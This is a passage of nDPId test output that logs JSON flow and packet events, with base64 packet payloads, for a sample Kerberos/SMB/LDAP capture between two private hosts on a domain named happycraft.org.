/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZEFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="} +00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="} +00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929981,"flow_last_seen":1549337929981,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337929981,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1549337929981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337929981,"pkt":"pB9ywglqAAgCHEeuCABFAADBADZAAIAGkQ+sEAjJrBAICMAKAFgVCzarRRAS7FAYAQB2LAAAqoGWMIGToAMCARKigYsEgYi0+C7lIM6lpWfLcf2ezyusajpC0TYc1OX1vmb3DhkyjRtC5TeZRg9Wzt\/ubCTSXWpwv+zrJOhZpUKxM\/PhogQbKSmJJuvTC3n4CxJc9SponZNFKF1Kt9\/yiDsesCZaEKdbgZEf1rZ1aHAiihciexKw\/Qr8RPyDjBEhr0yc0K8+XP7zeT3kqKdm"} +00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAACmEzJAAIAGfi6sEAgIrBAIyQBYwApFEBigFQs3RFAYAQCNWQAABoWQU5dMx7s3k7lFXcqa6uoE3YqM179MtGFm5Pp0PzGMSHM6ikhCYuxEbF8vf630PDV4M+ymDkgmnA6LZ83pNOsEhGLNGEwQsGjuja+QpA2dd9fjedDg4z2eYZ9DeqXNfMVtviu+Fd00prhwc+9nnU9I900bDPmSAhZM9lsL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337929983,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337929983,"pkt":"pB9ywglqAAgCHEeuCABFAAEyADpAAIAGkJqsEAjJrBAICMAJAYUOQjJnSJfL+1AYAQBrWQAA8TZc0LDMp13P2bhHUwE3wC3znhyPA6u84KleikgMfgmc3jalHTIxDwXMnjy\/W4F7\/2WZoUcx2XOew9rGWayLePl5BZIz7shN5PFXYJc\/9PAyv29TC7M2XLiMKexhyeYlRE9uvUtK9DAnR\/ttWEC9zdC56cQON1H8q936tfR+Slz7RKm2uwASDHI8fSFcEQQxtgqaAo4BBsj3qlqLB0lXoxQ8eGOcEVy2\/38vMlSj+c\/3tdAxc+T2J+ChqVKK6Ti6p9NJhgfdb6n6Fkr1nJ\/E0PHo7Ab3tBkqkSpNzV9oaIDc\/AnEKYXHdAsdm\/IAEKeNDZ3xj3dnB41oCyCZcvi9r2HqvrS9bMHFZEs="} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} +00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} +00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} +00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"} +00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337930217,"pkt":"AAgCHEeupB9ywglqCABFAACmE1FAAIAGfg+sEAgIrBAIyQBYwBCtJNt5bgP1KVAYAQC1BwAApQG9zo7oa2HyeKU61c2m29Ax+Ioczo4ZbPhC81jR0pDanr7lBKhJeMuGW\/uva7FyAslnHaJSlZ\/JCHVy9T8T0Ut1tj8cqy\/o\/YC+6XwQJV1\/l63dulAmK8KMVnuSbTDSVBQ5iahKxwLlZ8cbK3LMBirQeX8FcESDlzlIPsVQ"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930219,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":1,"thread_ts_msec":1549337930219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":429,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":429,"pkt_l4_len":395,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAGfAF1AAIAGkAqsEAjJrBAICMANwANTRo4+sysn9FAYAQASVgAAOJsrJlDNtr7H4lcner+4Ya97utGtvfHqO\/A9pIIBWDCCAVSgAwIBEqKCAUsEggFHE7YBEd08uXxTAz9oATIBnzsu+CIXQ7IKgHphso5XWVrf1UwI0kS3bNe0YDIltyDk2xHWA\/s5Rnf1JAD5LdMYfWfRtly9XMnusGEqHhr+HUrsB70ut1E9AZfE9oDmCRiRKgSi\/yPqeUdMQ3mTdU1fxpZbOqOrcP2UxT7TverwRJibh+asJMQhC1cH82k0XRAktx95xJlXR3QKNE1DR8fsq9gq2Y16fmA9gsztPUDC4IkAL71ItK34puHol45q2g1+vM2umAkKTXGS4uZkIzxH5rv1eNIbWz6GtEw1jeT5kTsqyd\/cgQicx4yHy9VJKmfjweCCyOHHgJ0JONAYKLNrmUspunn\/qiNj30BsQPTsl8DziFoWtJvBGiR7UAPGmzNl3CewZOrjtG26JZPGTaTuBek+GwxKg7cb\/ze4riey9Wnfq0rUqdvf"} 